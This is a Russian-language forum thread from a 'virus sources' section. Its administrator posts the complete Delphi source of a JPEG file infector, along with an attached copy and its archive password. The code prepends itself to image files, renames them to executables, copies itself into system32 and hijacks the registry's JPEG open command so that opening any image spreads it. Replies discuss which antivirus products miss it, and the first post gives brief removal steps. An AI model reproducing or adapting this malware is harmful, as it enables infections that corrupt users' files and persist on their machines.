Очень простенький вирус заражающий JPEG-файлы

Тема в разделе "Исходники вирусов", создана пользователем X-Shar, 30 июн 2012.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +967 / 152 / -29
    Jabber:
    Telegram:
    При запуске он ищет в текущем каталоге все файлы, имеющие расширения *.JPE
    *.JPEG *.JPG, и записывается в их начало. После чего, переименовывает
    заражённые файлы в *.EXE.
    При открытии заражённого файла, вирус извлекает восстановленную картинку во
    временный файл, и отображает её. После того, как пользователь закроет картинку,
    временный файл уничтожается.
    Кроме того, вирус так изменяет системный реестр, что при открытии
    любого JPEG-файла будет происходить его заражение.
    Таким образом, для полного заражения системы достаточно всего лишь одного
    запуска вируса на компьютере!

    Восстановление:

    1) Удаляешь из папки Windows\system32 файл shimgvw.exe
    2) Записываешь в ключ реестра HKEY_CLASSES_ROOT\jpegfile\shell\open\command
    строку:
    rundll32.exe C:\WINDOWS\system32\shimgvw.dll,ImageView_Fullscre en %1

    Написан на делфи.

    Пароль:111
     

    Вложения:

    • Мне нравится Мне нравится x 9
  2. Diverso Житель форума
    Diverso
    Ответить в чате

    Форумчанин

    Регистрация:
    14.03.2013
    Сообщения:
    28
    Симпатии:
    59
    Пол:
    Мужской
    Репа:
    +59 / 0 / -1
    Avast IS 9 beta не отреагировал!!!
     
    • Мне нравится Мне нравится x 4
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +967 / 152 / -29
    Jabber:
    Telegram:
    Что не красит Аваст!, вирус-то старенький, да и простенький, вот его исходник на делфи:

    Код:
    {
    Исходник вируса JPEGINFECTOR 2.0 by Abaston.
    Данный вирус является первым в мире полноценным вирусом, способным
    распространяться через JPEG-файлы.
    При запуске он ищет в текущем каталоге все файлы, имеющие расширения *.JPE
    *.JPEG *.JPG, и записывается в их начало. После чего, переименовывает
    заражённые файлы в *.EXE.
    При открытии заражённого файла, вирус извлекает восстановленную картинку во
    временный файл, и отображает её. После того, как пользователь закроет картинку,
    временный файл уничтожается.
    Кроме того, вирус так изменяет системный реестр, что при открытии
    любого JPEG-файла будет происходить его заражение.
    Таким образом, для полного заражения системы достаточно всего лишь одного
    запуска вируса на компьютере!
    }
     
    program JPEGINFECTOR;
    uses shellapi,sysutils,registry,windows;
    const virsize=47104;	//длина вируса, запакованного UPX
    var f1,f2:file;
    nr,nw:longint;
    reg:tregistry;
    victims:tsearchrec;
    buf:array[1..virsize] of byte;
     
    {$R *.RES}
     
    //определение пути к системной папке
    function system32():string;
    var len:uint;
    buffer:string;
    begin
    setlength(buffer,max_path+1);
    len:=getsystemdirectory(pchar(buffer),max_path);
    setlength(buffer,len);
    system32:=buffer;
    end;
     
    //процедура извлечения картинки во временный файл
    procedure go;
    begin
    try
    assignfile(f2,paramstr(0)+'.bmp');
    rewrite(f2,1);
    seek(f1,virsize);
    repeat
    filemode:=0;
    blockread(f1,buf,virsize,nr);
    filemode:=2;
    blockwrite(f2,buf,nr,nw);
    until (nr=0) or (nw<>nr);
    closefile(f1);
    closefile(f2);
    shellexecute(0,'open',pchar(paramstr(0)+'.bmp'),nil,nil,sw_show);
    sleep(1000);
    deletefile(pchar(paramstr(0)+'.bmp'));
    except
    end;
    end;
     
    //процедура заражения файлов в текущем каталоге
    procedure infect(victim:string);
    begin
    try
    assignfile(f1,victim);
    rename(f1,'fuck');
    filemode:=0;
    assignfile(f2,paramstr(0));
    reset(f2,1);
    blockread(f2,buf,virsize);
    filemode:=2;
    closefile(f2);
    assignfile(f1,victim);
    rewrite(f1,1);
    blockwrite(f1,buf,virsize);
    assignfile(f2,'fuck');
    reset(f2,1);
    repeat
    blockread(f2,buf,virsize,nr);
    blockwrite(f1,buf,nr,nw);
    until (nr=0) or (nw<>nr);
    closefile(f1);
    closefile(f2);
    deletefile(pchar('fuck'));
    except
    end;
    end;
     
    begin
    filemode:=0;
    //проверяем наличие копии вируса по адресу Windows\system32\shimgvw.exe
    if findfirst(system32+'\shimgvw.exe',faanyfile,victims)<>0 then
    begin
    //создаём копию
    assignfile(f1,paramstr(0));
    reset(f1,1);
    blockread(f1,buf,virsize);
    closefile(f1);
    assignfile(f2,system32+'\shimgvw.exe');
    rewrite(f2,1);
    blockwrite(f2,buf,virsize);
    closefile(f2);
    //записываем копию в реестр
    reg:=tregistry.create();
    reg.rootkey:=HKEY_CLASSES_ROOT;
    reg.deletekey('jpegfile\shell\open');
    if reg.openkey('jpegfile\shell\open\command',true) then
    begin
    reg.writestring('','"'+system32+'\shimgvw.exe"'+' "%1"');
    reg.closekey();
    end;
    reg.free();
    end;
    try
    assignfile(f1,paramstr(0));
    reset(f1,1);
    filemode:=2;
    //восстанавливаем заражённую картинку
    if filesize(f1)>virsize then go;
    closefile(f1);
    except
    end;
    //если запущен дроппер вируса, отображаем JPEG-файл
    if paramcount>0 then
    begin
    renamefile(paramstr(1),paramstr(1)+'.bmp');
    shellexecute(0,'open',pchar(paramstr(1)+'.bmp'),nil,nil,sw_show);
    sleep(1000);
    renamefile(paramstr(1)+'.bmp',paramstr(1));
    end;
    //ищем и заражаем все JPE-файлы
    if findfirst('*.jpe',faanyfile,victims)=0 then
    repeat
    infect(victims.name);
    until findnext(victims)<>0;
    //ищем и заражаем все JPG-файлы
    if findfirst('*.jpg',faanyfile,victims)=0 then
    repeat
    infect(victims.name);
    until findnext(victims)<>0;
    //переименовываем все заражённые файлы в EXE
    winexec(pchar('cmd.exe /c ren *.jpe *.exe'),sw_hide);
    winexec(pchar('cmd.exe /c ren *.jpg *.exe'),sw_hide);
    end.

    Безымянный.
     
    • Мне нравится Мне нравится x 6
  4. Scooter Пользователь
    Scooter
    Ответить в чате

    Первый уровень

    Регистрация:
    30.08.2013
    Сообщения:
    22
    Симпатии:
    67
    Пол:
    Мужской
    Репа:
    +67 / 0 / -0
    emsisoft тоже находитlike it
     
    • Мне нравится Мне нравится x 3
  5. BioNIX Гость
    BioNIX
    Ответить в чате

    Репа:
    +0 / 0 / -0
    05-09-2013 20-54-25.
     
    • Мне нравится Мне нравится x 2
  6. Garo) Уважаемый пользователь
    Garo)
    Ответить в чате

    Форумчанин

    Регистрация:
    23.08.2013
    Сообщения:
    148
    Симпатии:
    402
    Пол:
    Мужской
    Репа:
    +403 / 0 / -0
    не плохо ) может у кого Нечта найдется ?xD недавно комп у чела смотрел более 1000 зараженых файлов
    И самое интересное что переустановка 100% гарантии вам не даст , нужно все файлы которые хотите перенести на др винду проверять на вирус и если он найдется то лечить с помощью Live CD
    1 файл пропустите и все начнется заново)))
     
    • Мне нравится Мне нравится x 2

Поделиться этой страницей